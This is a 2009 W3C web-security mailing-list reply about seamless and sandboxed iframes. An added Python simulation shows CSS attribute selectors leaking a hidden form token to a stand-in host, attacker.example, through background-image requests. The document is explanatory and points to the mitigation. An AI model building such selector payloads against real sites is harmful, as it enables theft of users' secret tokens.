
Re: Seamless iframes + CSS3 selectors = bad idea

From: Maciej Stachowiak <mjs@apple.com>
Date: Sat, 05 Dec 2009 23:06:40 -0800
Cc: Ian Hickson <ian@hixie.ch>, public-web-security@w3.org
Message-id: <7454FD93-A7F3-4D2C-AFD4-6B5CC8FC47CA@apple.com>
To: "sird@rckc.at" <sird@rckc.at>

On Dec 5, 2009, at 10:58 PM, sird@rckc.at wrote:

> IIRC sandboxed iframes can't frame.

My reading of the spec (confirmed by Hixie) is that sandboxed iframes can frame - perhaps they should not be able to.

> In any case sandboxed iframes are a joke unless you use data URIs... that should be cross-origin anyway.

Not setting the allow-same-origin flag makes them about as restricted as using a data: URI.

  - Maciej

>> On Dec 6, 2009 2:55 PM, "Maciej Stachowiak" <mjs@apple.com> wrote:
>> On Dec 5, 2009, at 10:27 PM, Maciej Stachowiak wrote: > > I think the attack is that you can injec...
>>
>> OK, I thought of a possible real vulnerability. A trusted host page on the site wants to embed some untrusted user-generated content with the ability to modify it, so it embeds it, hosted from its own server, using <iframe sandbox="allow-same-origin">. This should prevent scripting and plugins, so in theory it seems safe. But the untrusted content could embed a further iframe with the seamless flag, embedding an arbitrary document from the hosting service. It can then use CSS selectors to probe for data in that document.
>>
>> Regards,
>> Maciej
Received on Sunday, 6 December 2009 07:07:14 GMT
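The following is an added simulation of the scenario Maciej describes in the quoted message; it is not code from the thread or from any browser vendor. It assumes the mechanism the message leaves implicit: the seamless attribute in the HTML5 draft of the time let the embedding document's stylesheet apply to a same-origin framed document, and a stylesheet with no script can still leak data through attribute selectors (input[value^="..."]) whose declarations load a background image from an attacker-observed URL. The "victim" document, the field name token, the hex alphabet and the sink host attacker.example are all constructed for the example. The only part of the sandbox attribute the simulation looks at is allow-same-origin, since without it the sandboxed content has a unique origin and the nested seamless frame would not be same-origin with it (that consequence is also an assumption of the example, matching Maciej's remark that omitting the flag is about as restrictive as a data: URI).

```python
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructed: the characters the probe tries as the next character of the secret.
ALPHABET = "0123456789abcdef"


def probe_rules(known_prefix, field_name="token", sink="https://attacker.example/leak"):
    """Emit one CSS rule per candidate next character of the secret.

    Each selector only matches an <input> whose value starts with
    known_prefix + c, so at most one rule's background image loads and
    its URL tells the attacker which guess was right. Sandboxed content
    cannot run script, but it can still cause the image request.
    """
    rules = []
    for c in ALPHABET:
        guess = known_prefix + c
        rules.append(
            f'input[name="{field_name}"][value^="{guess}"] '
            f'{{ background-image: url("{sink}?v={quote(guess)}"); }}'
        )
    return "\n".join(rules)


# Parsers for the narrow rule shape produced above (simulation only).
_RULE = re.compile(
    r'^(\w+)((?:\[\w+\^?="[^"]*"\])+) \{ background-image: url\("([^"]*)"\); \}$'
)
_ATTR = re.compile(r'\[(\w+)(\^?=)"([^"]*)"\]')


def element_matches(element, tag, attr_conditions):
    """Evaluate a tag selector plus [attr="v"] / [attr^="v"] conditions."""
    if element["tag"] != tag:
        return False
    for name, op, value in attr_conditions:
        actual = element.get(name)
        if actual is None:
            return False
        if op == "=" and actual != value:
            return False
        # CSS: [attr^=""] matches nothing, otherwise a prefix test.
        if op == "^=" and (value == "" or not actual.startswith(value)):
            return False
    return True


def simulate_fetches(stylesheet, document):
    """Return the URLs a browser would request: one per rule whose
    selector matches some element of the (seamlessly framed) document."""
    fetched = []
    for line in stylesheet.splitlines():
        m = _RULE.match(line)
        if not m:
            raise ValueError(f"unsupported rule in simulation: {line}")
        tag, attrs, url = m.groups()
        if any(element_matches(el, tag, _ATTR.findall(attrs)) for el in document):
            fetched.append(url)
    return fetched


def leaked_value(url):
    """Recover the guessed prefix from the sink URL the 'browser' fetched."""
    return parse_qs(urlparse(url).query)["v"][0]


def sandbox_allows_same_origin(sandbox_attr):
    """True if the sandbox keyword list keeps the framed content same-origin."""
    return "allow-same-origin" in sandbox_attr.split()


def exfiltrate(sandbox_attr, framed_document, field_name="token"):
    """Drive the character-by-character probe until no rule matches.

    Returns the recovered value, or None when the outer sandbox lacks
    allow-same-origin (assumption: the inner seamless frame is then not
    same-origin with the attacker's content, so its styles do not apply).
    """
    if not sandbox_allows_same_origin(sandbox_attr):
        return None
    prefix = ""
    while True:
        urls = simulate_fetches(probe_rules(prefix, field_name), framed_document)
        if not urls:
            return prefix
        prefix = leaked_value(urls[0])


# Constructed stand-in for "an arbitrary document from the hosting service":
# a settings form carrying a hidden per-user token and an unrelated field.
VICTIM_PAGE = [
    {"tag": "form", "action": "/settings"},
    {"tag": "input", "type": "hidden", "name": "token", "value": "9f3a"},
    {"tag": "input", "type": "text", "name": "display_name", "value": "alice"},
]

if __name__ == "__main__":
    print(exfiltrate("allow-same-origin", VICTIM_PAGE))  # the hidden token leaks
    print(exfiltrate("allow-forms", VICTIM_PAGE))        # None: unique origin, no leak
```

The loop shows why the combination matters: each round needs only image loads, which the sandbox does not block, and each round narrows one character, so the framed document's hidden token is read out in len(token) + 1 rounds without any script. The same run with the sandbox attribute lacking allow-same-origin stops immediately, which is the mitigation the thread points at.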
